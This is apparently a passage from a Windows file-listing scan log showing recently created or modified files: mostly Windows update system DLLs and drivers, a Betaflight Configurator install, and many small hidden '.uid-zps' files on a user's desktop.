2019-05-15 10:04 - 2019-04-19 11:25 - 000423936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2019-05-15 10:04 - 2019-04-19 07:07 - 000985400 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2019-05-15 10:04 - 2019-04-19 07:06 - 002571632 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2019-05-15 10:04 - 2019-04-19 07:06 - 000798520 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2019-05-15 10:04 - 2019-04-19 07:06 - 000713264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2019-05-15 10:04 - 2019-04-19 07:06 - 000436024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2019-05-15 10:04 - 2019-04-19 07:06 - 000274232 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2019-05-15 10:04 - 2019-04-19 07:02 - 000831800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2019-05-15 10:04 - 2019-04-19 07:01 - 001982008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2019-05-15 10:04 - 2019-04-19 07:01 - 000581592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVideoDSP.dll
2019-05-15 10:04 - 2019-04-19 07:01 - 000576016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2019-05-15 10:04 - 2019-04-19 07:01 - 000380728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2019-05-15 10:04 - 2019-04-19 06:43 - 000150016 _____ (Microsoft Corporation) C:\WINDOWS\system32\fcon.dll
2019-05-15 10:04 - 2019-04-19 06:42 - 004384256 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2019-05-15 10:04 - 2019-04-19 06:41 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmmigrator.dll
2019-05-15 10:04 - 2019-04-19 06:41 - 000095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\EduPrintProv.exe
2019-05-15 10:04 - 2019-04-19 06:40 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserexport.exe
2019-05-15 10:04 - 2019-04-19 06:40 - 000243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpnServiceDS.dll
2019-05-15 10:04 - 2019-04-19 06:40 - 000172544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\enrollmentapi.dll
2019-05-15 10:04 - 2019-04-19 06:40 - 000167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\FilterDS.dll
2019-05-15 10:04 - 2019-04-19 06:40 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetDriverInstall.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 005307392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 000567296 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 000425472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SDDS.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingASDS.dll
2019-05-15 10:04 - 2019-04-19 06:39 - 000361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2019-05-15 10:04 - 2019-04-19 06:39 - 000204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 002368512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000593408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000391680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000300544 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2019-05-15 10:04 - 2019-04-19 06:38 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000953856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000445952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000381952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000366080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2019-05-15 10:04 - 2019-04-19 06:37 - 000118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 002909696 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 001300992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000814592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000546816 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2019-05-15 10:04 - 2019-04-19 06:36 - 000186368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mdmregistration.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 001938944 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 001458688 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 001175552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 001156608 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000784896 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000607232 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000535040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000523776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2019-05-15 10:04 - 2019-04-19 06:35 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000935936 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000899584 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000885760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2019-05-15 10:04 - 2019-04-19 06:34 - 000653312 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2019-05-15 10:04 - 2019-04-19 05:18 - 000806360 _____ C:\WINDOWS\SysWOW64\locale.nls
2019-05-15 10:04 - 2019-04-19 05:18 - 000806360 _____ C:\WINDOWS\system32\locale.nls
2019-05-15 10:04 - 2019-04-09 03:48 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2019-05-15 10:04 - 2019-04-09 03:48 - 000376320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll
2019-05-15 10:04 - 2019-04-09 03:48 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2019-05-15 10:04 - 2019-04-09 03:48 - 000341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2019-05-15 10:04 - 2019-04-09 03:48 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll
2019-05-15 09:23 - 2019-05-15 09:23 - 000000110 ____H C:\Users\TATTOO NR\Desktop\2yCh4fzygIE.jpg.uid-zps
2019-05-14 09:25 - 2019-05-14 09:25 - 000000110 ____H C:\Users\TATTOO NR\Desktop\co-tak-corgon.jpg.uid-zps
2019-05-13 15:14 - 2019-05-13 15:14 - 000000110 ____H C:\Users\TATTOO NR\Desktop\d22d77da76be5eb9d79e590bd0860881.jpg.uid-zps
2019-05-13 09:32 - 2019-05-13 09:32 - 000000110 ____H C:\Users\TATTOO NR\Desktop\59883181_270092247114057_4655140165361074176_n.jpg.uid-zps
2019-05-13 09:28 - 2019-05-13 09:28 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Bez y jtfjfy.png.uid-zps
2019-05-10 13:01 - 2019-05-10 13:01 - 000000000 _____ C:\Users\TATTOO NR\Desktop\Nový textový dokument.txt
2019-05-09 19:52 - 2019-05-09 19:52 - 000000110 ____H C:\Users\TATTOO NR\Desktop\cover.jpg.uid-zps
2019-05-09 16:54 - 2019-06-10 09:36 - 000001405 _____ C:\Users\TATTOO NR\Desktop\Betaflight Configurator.lnk
2019-05-09 16:54 - 2019-05-09 16:54 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Betaflight
2019-05-09 16:54 - 2019-05-09 16:54 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\betaflight-configurator
2019-05-09 16:52 - 2019-05-09 16:52 - 000000000 ____D C:\Program Files (x86)\Betaflight
2019-05-09 16:47 - 2019-05-09 16:51 - 082048670 _____ C:\Users\TATTOO NR\Downloads\betaflight-configurator-installer_10.5.1_win32.exe
2019-05-09 09:00 - 2019-05-09 09:00 - 000000110 ____H C:\Users\TATTOO NR\Desktop\50333866_229676244575384_4473366742688595968_n.jpg.uid-zps
2019-05-07 13:35 - 2019-05-07 13:35 - 000000110 ____H C:\Users\TATTOO NR\Desktop\59848646_430756721048088_676545310050222080_n.jpg.uid-zps
2019-05-07 12:34 - 2019-05-07 12:36 - 000000000 ____D C:\ProgramData\HP
2019-05-06 14:59 - 2019-05-06 14:59 - 000000110 ____H C:\Users\TATTOO NR\Desktop\59713434_1280090952139411_7822264906450731008_n.jpg.uid-zps
2019-05-06 09:19 - 2019-05-06 09:19 - 000000110 ____H C:\Users\TATTOO NR\Desktop\a12_angel_by_articmoonsky-d2zou38.jpg.uid-zps
2019-04-30 09:00 - 2019-04-30 09:00 - 000000110 ____H C:\Users\TATTOO NR\Desktop\56887114_350001178976974_3740757377687748608_n.jpg.uid-zps
2019-04-30 08:56 - 2019-04-30 08:56 - 000000110 ____H C:\Users\TATTOO NR\Desktop\90496b7ad5fe39781948a4f4ff367237.jpg.uid-zps
2019-04-19 09:03 - 2019-04-19 09:03 - 000000110 ____H C:\Users\TATTOO NR\Desktop\-xhb5PQiQ0mLryhp08uEkQ.jpg.uid-zps
2019-04-19 09:00 - 2019-04-19 09:00 - 000000110 ____H C:\Users\TATTOO NR\Desktop\2895683.jpg.uid-zps
2019-04-18 09:13 - 2019-04-18 09:13 - 000000110 ____H C:\Users\TATTOO NR\Desktop\48406988_212477236353110_4123837596855959552_n.jpg.uid-zps
2019-04-16 09:29 - 2019-04-16 09:29 - 000000110 ____H C:\Users\TATTOO NR\Desktop\53347565_772680483131945_3388894015913984000_n.jpg.uid-zps
2019-04-15 14:57 - 2019-04-15 14:57 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\PUSH Entertainment
2019-04-15 14:57 - 2019-04-15 14:57 - 000000000 ____D C:\ProgramData\PUSH Entertainment
2019-04-15 09:44 - 2019-04-15 09:44 - 000000110 ____H C:\Users\TATTOO NR\Desktop\mandala-lotus-designs-lotus-flower-tattoo-design-on-tatted-up.jpg.uid-zps
2019-04-12 09:02 - 2019-04-12 09:02 - 000000110 ____H C:\Users\TATTOO NR\Desktop\636644945194563959.png.uid-zps
2019-04-12 08:57 - 2019-04-12 08:57 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Symbolic-Decals-Triple-Horn-Of-Odin-Decal-Sticker-Vinyl-Decal-Sticker__15659.1506198913.jpg.uid-zps
2019-04-11 14:55 - 2019-04-11 14:55 - 000000110 ____H C:\Users\TATTOO NR\Desktop\53894691_2631269396912723_7807712191452282880_n.jpg.uid-zps
2019-04-11 09:40 - 2019-04-11 09:40 - 000000110 ____H C:\Users\TATTOO NR\Desktop\dac9b1d1cfdc928a754c623a4080eec0.jpg.uid-zps
2019-04-11 09:15 - 2019-04-11 09:15 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Bez názvu.pngyv5rvyw.png.uid-zps
2019-04-11 09:10 - 2019-04-11 09:10 - 000000110 ____H C:\Users\TATTOO NR\Desktop\49947531_363112507834625_4661429401936723968_n.jpg.uid-zps
2019-04-10 09:36 - 2019-04-10 09:36 - 000000110 ____H C:\Users\TATTOO NR\Desktop\image.jpg.uid-zps
2019-04-10 09:12 - 2019-04-02 14:38 - 000094008 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2019-04-10 09:12 - 2019-04-02 14:18 - 000059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2019-04-10 09:12 - 2019-04-02 14:16 - 001030144 _____ (Microsoft Corporation) C:\WINDOWS\system32\termsrv.dll
2019-04-10 09:12 - 2019-04-02 14:15 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleprn.dll
2019-04-10 09:12 - 2019-04-02 14:13 - 001605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2019-04-10 09:12 - 2019-04-02 14:11 - 001857536 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2019-04-10 09:12 - 2019-04-02 14:10 - 000130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\luafv.sys
2019-04-10 09:12 - 2019-04-02 14:10 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\sxssrv.dll
2019-04-10 09:12 - 2019-04-02 11:11 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2019-04-10 09:12 - 2019-04-02 11:10 - 000117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleprn.dll
2019-04-10 09:12 - 2019-04-02 11:07 - 001586688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2019-04-10 09:12 - 2019-04-02 10:21 - 002467536 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2019-04-10 09:12 - 2019-04-02 10:21 - 000735680 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2019-04-10 09:12 - 2019-04-02 10:20 - 002719032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2019-04-10 09:12 - 2019-04-02 10:19 - 000786080 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2019-04-10 09:12 - 2019-04-02 09:48 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netbt.sys
2019-04-10 09:12 - 2019-04-02 09:47 - 001214464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
2019-04-10 09:12 - 2019-04-02 09:45 - 000323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2019-04-10 09:12 - 2019-04-02 09:44 - 001724416 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpserverbase.dll
2019-04-10 09:12 - 2019-04-02 09:44 - 001421312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpbase.dll
2019-04-10 09:12 - 2019-04-02 07:05 - 001989544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2019-04-10 09:12 - 2019-04-02 07:04 - 000604008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2019-04-10 09:12 - 2019-04-02 07:04 - 000560600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2019-04-10 09:12 - 2019-04-02 06:41 - 001540096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpserverbase.dll
2019-04-10 09:12 - 2019-04-02 06:41 - 001235968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpbase.dll
2019-04-10 09:12 - 2019-04-02 06:41 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2019-04-10 09:12 - 2019-04-02 06:40 - 001073664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
2019-04-10 09:12 - 2019-03-14 16:52 - 003933296 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2019-04-10 09:12 - 2019-03-14 16:51 - 000157192 _____ (Microsoft Corporation) C:\WINDOWS\system32\consent.exe
2019-04-10 09:12 - 2019-03-14 16:35 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfoext.dll
2019-04-10 09:12 - 2019-03-14 16:34 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2019-04-10 09:12 - 2019-03-14 16:33 - 000182784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdpdr.sys
2019-04-10 09:12 - 2019-03-14 16:33 - 000082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storqosflt.sys
2019-04-10 09:12 - 2019-03-14 16:33 - 000030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\RpcPing.exe
2019-04-10 09:12 - 2019-03-14 16:31 - 000198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll
2019-04-10 09:12 - 2019-03-14 16:30 - 000675328 _____ (Microsoft Corporation) C:\WINDOWS\system32\objsel.dll
2019-04-10 09:12 - 2019-03-14 16:30 - 000440832 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2019-04-10 09:12 - 2019-03-14 16:29 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2019-04-10 09:12 - 2019-03-14 16:28 - 000560640 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsound.dll
2019-04-10 09:12 - 2019-03-14 16:08 - 003611264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2019-04-10 09:12 - 2019-03-14 15:56 - 000160768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll
2019-04-10 09:12 - 2019-03-14 15:55 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RpcPing.exe
2019-04-10 09:12 - 2019-03-14 15:53 - 000625664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2019-04-10 09:12 - 2019-03-14 15:53 - 000559104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\objsel.dll
2019-04-10 09:12 - 2019-03-14 15:53 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppBroker.dll
2019-04-10 09:12 - 2019-03-14 15:52 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsound.dll
2019-04-10 09:12 - 2019-03-14 10:57 - 000611640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2019-04-10 09:12 - 2019-03-14 10:56 - 000375096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2019-04-10 09:12 - 2019-03-14 10:38 - 000090360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mpr.dll
2019-04-10 09:12 - 2019-03-14 10:37 - 001171568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2019-04-10 09:12 - 2019-03-14 10:28 - 000152072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2019-04-10 09:12 - 2019-03-14 10:27 - 000097600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mpr.dll
2019-04-10 09:12 - 2019-03-14 10:26 - 002421048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2019-04-10 09:12 - 2019-03-14 10:26 - 001014344 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2019-04-10 09:12 - 2019-03-14 10:26 - 000481048 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase_enclave.dll
2019-04-10 09:12 - 2019-03-14 10:26 - 000175416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spacedump.sys
2019-04-10 09:12 - 2019-03-14 10:22 - 002700288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2019-04-10 09:12 - 2019-03-14 10:19 - 002969600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2019-04-10 09:12 - 2019-03-14 10:18 - 000095744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2019-04-10 09:12 - 2019-03-14 10:18 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credui.dll
2019-04-10 09:12 - 2019-03-14 10:18 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 002258944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 000288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 000261632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore6.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wcmapi.dll
2019-04-10 09:12 - 2019-03-14 10:17 - 000057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntlanman.dll
2019-04-10 09:12 - 2019-03-14 10:15 - 000415744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2019-04-10 09:12 - 2019-03-14 10:15 - 000318464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore.dll
2019-04-10 09:12 - 2019-03-14 10:15 - 000195072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShellCommonCommonProxyStub.dll
2019-04-10 09:12 - 2019-03-14 10:15 - 000102400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\negoexts.dll
2019-04-10 09:12 - 2019-03-14 10:14 - 001070080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2019-04-10 09:12 - 2019-03-14 10:14 - 000856576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2019-04-10 09:12 - 2019-03-14 10:14 - 000735744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2019-04-10 09:12 - 2019-03-14 10:14 - 000345088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2019-04-10 09:12 - 2019-03-14 10:14 - 000330752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.Workflow.dll
2019-04-10 09:12 - 2019-03-14 10:14 - 000138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll
2019-04-10 09:12 - 2019-03-14 10:13 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2019-04-10 09:12 - 2019-03-14 10:13 - 000145408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2019-04-10 09:12 - 2019-03-14 09:58 - 004708864 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2019-04-10 09:12 - 2019-03-14 09:58 - 002509824 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2019-04-10 09:12 - 2019-03-14 09:57 - 000106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationControllerPS.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 003392000 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 000120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 000055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msscntrs.dll
2019-04-10 09:12 - 2019-03-14 09:56 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 003601920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Service.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 002739200 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000528896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2019-04-10 09:12 - 2019-03-14 09:55 - 000458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cldflt.sys
2019-04-10 09:12 - 2019-03-14 09:55 - 000141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000134656 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmapi.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000069120 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntlanman.dll
2019-04-10 09:12 - 2019-03-14 09:55 - 000062976 _____ (Microsoft Corporation) C:\WINDOWS\system32\EASPolicyManagerBrokerHost.exe
2019-04-10 09:12 - 2019-03-14 09:55 - 000048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\credui.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000395776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000354304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore6.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000273408 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe
2019-04-10 09:12 - 2019-03-14 09:54 - 000118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\negoexts.dll
2019-04-10 09:12 - 2019-03-14 09:54 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcpopkeysrv.dll
2019-04-10 09:12 - 2019-03-14 09:53 - 000787968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2019-04-10 09:12 - 2019-03-14 09:53 - 000473600 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2019-04-10 09:12 - 2019-03-14 09:53 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.Workflow.dll
2019-04-10 09:12 - 2019-03-14 09:52 - 000532992 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuietHours.dll
2019-04-10 09:12 - 2019-03-14 09:52 - 000404480 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShellCommonCommonProxyStub.dll
2019-04-10 09:12 - 2019-03-14 09:52 - 000201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll
2019-04-10 09:12 - 2019-03-14 09:51 - 001216000 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2019-04-10 09:12 - 2019-03-14 09:51 - 001058304 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
